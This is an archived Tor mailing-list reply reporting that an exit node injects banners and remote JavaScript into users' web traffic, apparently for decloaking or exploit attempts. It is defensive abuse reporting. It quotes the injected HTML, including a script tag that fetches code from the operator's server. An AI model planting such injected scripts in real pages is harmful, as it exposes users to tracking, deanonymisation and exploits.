Banners injected in web pages at exit nodes TRHCourtney*

Freemor freemor at gmail.com
Tue Jun 2 12:20:11 UTC 2009


On Tue, 2 Jun 2009 05:36:43 -0600
John Brooks <special at dereferenced.net> wrote:

> Definitely abusive. Fortunately, because of how nearby most of the IPs
> are, Tor will treat them as family even if the operator neglected to,
> so it doesn't pose a risk to anonymity (other than the one outlying
> node, but even then it's a maximum of two), but this definitely looks
> like a badexit situation.
> 
> Honestly, why does somebody run a tor node if they keep
> connection/session logs? Seems like an odd place to look for a
> paycheck.
> 
>   - John Brooks
> 
Might be worse then that.. at least for improperly configures clients..
there deos seem to be javascript injection:

<div id="floaterma9">
    <img src="http://courtney.nullroute.net/2lol.gif"
style="display:none"></img> <script type='text/javascript'
    src='http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1'></script>
    <style> body {
        margin: 0 0 0 0 !important;
    }
    #Banner2 {
        width:728px;
        height:90px;
    }
    #textme {
        font-family:arial;
        color:#333;
        font-size:11px;
    }
    </style>

When I Followed
http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1
it had an interesting bit bit of code which linked to:
http://courtney.nullroute.net/openx-2.8.1/www/delivery/fl.js
Which tries to load up SWF objects..
Haven't picked it all apart yet (still no coffee) but I'm guessing it's
either decloaking attempts or exploit attempts.



-- 
freemor at gmail.com
freemor at yahoo.ca

This e-mail has been digitally signed with GnuPG - ( http://gnupg.org/ )
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://lists.torproject.org/pipermail/tor-talk/attachments/20090602/9ddde073/attachment.pgp>


More information about the tor-talk mailing list